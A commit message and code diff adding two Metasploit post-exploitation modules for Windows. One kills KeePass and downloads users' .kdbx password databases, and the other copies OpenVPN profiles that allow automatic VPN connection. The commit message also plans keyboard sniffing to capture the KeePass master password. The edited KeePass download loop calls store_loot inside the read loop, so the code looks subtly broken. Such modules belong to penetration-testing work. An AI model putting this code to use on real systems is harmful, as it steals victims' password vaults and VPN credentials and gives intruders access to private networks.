Added 2 post modules for windows

-Keepass jacker will kill keepass process and then look for kdbx files
on users document and desktop and download them. (next step for this
module will be to lock keepass, activate keyboard sniffing as to try to
steal master password) also need to make it compatible with OLD keepass
files aka .kdb
-OpenVPN profiles jack - will go to the default folder that contains the
profiles used for auto connect on OpenVPN GUI client and download them
these can allow an attacker to automatically connect to the vpn!

modules/post/windows/gather/keepass_jacker.rb

@@ -11,58 +11,71 @@
 require 'rex'
 require 'msf/core/post/windows/user_profiles'
 
+
+
 class Metasploit3 < Msf::Post
 	include Msf::Auxiliary::Report
 	include Msf::Post::Windows::UserProfiles
-
 	def initialize(info={})
 		super( update_info( info,
-				'Name'          => 'Windows Keepass Database Finder',
-				'Description'   => %q{
-					This module downloads any keepass kdbx files that it finds
+			'Name'          => 'Windows Keepass Database Finder',
+			'Description'   => %q{
+				This module downloads any keepass kdbx files that it finds
 				},
 				'License'       => MSF_LICENSE,
-				'Author'        => [ 'balgan <balgan[at]balgan.eu>'],
+				'Author'        => [ 'balgan <balgan[at]ptcoresec.eu>', 'klinzter <klinzter[at]ptcoresec.eu'],
 				'Version'       => '$Revision: 3195e713 $',
 				'Platform'      => [ 'windows' ],
 				'SessionTypes'  => [ 'meterpreter' ]
-			))
+				))
 	end
 
 	def run
 		print_status("Checking All Users Documents Folders For Keepass Files...")
 		print_status("Attempting to kill keepass")
 		kill_keepass()
 		grab_user_profiles().each do |user|
+		print_status("Searching #{user['MyDocs']}")
 			next if user['MyDocs'] == nil
-			tmpath= user['MyDocs'] + "\\empty.kdbx"
-			print_status("Retrieving:" + tmpath)
-			jack_keepass(tmpath)
+			dir = user['MyDocs']
+			files = client.fs.dir.entries(dir)
+			files.each do |f|
+				if f.to_s.include?(".kdbx")
+					begin
+						filelocation = dir + "\\" + f
+						jack_keepass(filelocation)
+					end
+				end
+			end
+		end
+
+		grab_user_profiles().each do |user|
+			print_status("Searching #{user['Desktop']}")
 			next if user['Desktop'] == nil
-			tmpath= user['Desktop'] + "\\empty.kdbx"
-			print_status("Retrieving:" + tmpath)
-			jack_keepass(tmpath)
-
+			dir = user['Desktop']
+			files = client.fs.dir.entries(dir)
+			files.each do |f|
+				if f.to_s.include?(".kdbx")
+					begin
+						filelocation = dir + "\\" + f
+						jack_keepass(filelocation)
+					end
+				end
+			end
 		end
 	end
 
-	def jack_keepass(filename)
-		data     = ""
-		found    = session.fs.file.stat(filename) rescue nil
-		return if not found
-		print_status("Keepass Database Found At #{filename}")
-		print_status("     Retrieving keepass file...")
 
+	def jack_keepass(filename)
+		print_status("Downloading:  #{filename}")
 		begin
-			wallet = session.fs.file.new(filename, "rb")
-			until wallet.eof?
-				data << wallet.read
+			path = filename
+				data = ""
+			filesaving = session.fs.file.new(path, "rb")
+			until filesaving.eof?
+				data << filesaving.read
+			store_loot("KEEPASS.kdbx", "text/plain", session, data, filename, "loot #{path}")
 			end
-			store_loot("keepass.kdbx", "application/octet-stream", session, data, filename, "Keepass database")
-		rescue ::Interrupt
-			raise $!
-		rescue ::Exception => e
-			print_error("Failed to download #{filename}: #{e.class} #{e}")
 		end
 	end
 
@@ -75,5 +88,4 @@ def kill_keepass
 			end
 		end
 	end
-
-end
+end

modules/post/windows/gather/openvpn_profiles_jack.rb

@@ -0,0 +1,84 @@
+# $Id: keepass_jacker.rb 2012-05-01 rapid7 $
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/user_profiles'
+
+class Metasploit3 < Msf::Post
+	include Msf::Auxiliary::Report
+	include Msf::Post::Windows::UserProfiles
+
+	def initialize(info={})
+		super( update_info( info,
+				'Name'          => 'OpenVPN Profile Downloader',
+				'Description'   => %q{
+					This module downloads OpenVPN Profiles that can be imported into the OpenVPN client to automatically connect to a VPN.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 'balgan <balgan[at]ptcoresec.eu>'],
+				'Version'       => '$Revision: 3195e713 $',
+				'Platform'      => [ 'windows' ],
+				'SessionTypes'  => [ 'meterpreter' ]
+			))
+	end
+
+	def run
+		arch = client.sys.config.sysinfo["Architecture"]
+		print_status("Checking if folder exists...")
+		if arch == "x86"
+			dir = "C:\\Program Files\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\"
+			begin
+				session.fs.dir.entries(dir)
+				jack_openvpnprofiles(dir)
+			rescue
+				print_error("Path seems invalid: #{dir}")
+				return nil
+			end
+		else
+			dir = "C:\\Program Files (x86)\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\"
+			begin
+				session.fs.dir.entries(dir)
+				jack_openvpnprofiles(dir)
+			rescue
+				print_error("Path seems invalid: #{dir}")
+				return nil
+			end
+
+		end
+	end
+
+	def jack_openvpnprofiles(folder)
+		print_status("OpenVPN Profiles Folder Found at:  #{folder}")
+		print_status("Retrieving Profile Files...")
+		files = [""]
+		files = client.fs.dir.entries(folder)
+		print_status("#{files}")
+		files.each do |f|
+		begin
+			path = folder + f
+			print_status("CURRENT PATH #{path}")
+			data = ""
+					next if f =~/^(\.+)$/
+				begin
+				filesaving = session.fs.file.new(path, "rb")
+				until filesaving.eof?
+					data << filesaving.read
+				end
+				store_loot("#{f}", "text/plain", session, data, f, "loot #{path}")
+			rescue ::Interrupt
+				raise $!
+			rescue ::Exception => e
+				print_error("Failed to download #{path}: #{e.class} #{e}")
+			end
+			end
+		end
+		end
+
+	end